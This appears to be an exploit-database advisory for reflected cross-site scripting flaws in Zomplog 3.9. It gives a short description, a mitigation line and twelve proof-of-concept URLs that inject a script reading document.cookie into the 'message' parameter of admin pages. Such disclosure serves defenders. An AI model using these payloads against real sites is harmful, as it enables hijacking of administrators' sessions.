header-logo
Suggest Exploit
vendor:
Zomplog
by:
7.5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: Zomplog
Affected Version From: Zomplog 3.9
Affected Version To: N/A (other versions may also be affected)
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Zomplog Multiple Cross-Site Scripting Vulnerabilities

Zomplog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize and validate user-supplied input before using it in the application.
Source

Exploit-DB raw data:

souce: https://www.securityfocus.com/bid/42457/info

Zomplog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Zomplog 3.9 is vulnerable; other versions may also be affected. 


http://www.example.com/admin/users.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/category.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/entry.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/newentry.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/comments.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/newpage.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/page.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/settings.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/changeclothes.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/settings_theme.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/themes.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/plugins.php?message=<script>alert(document.cookie);</script>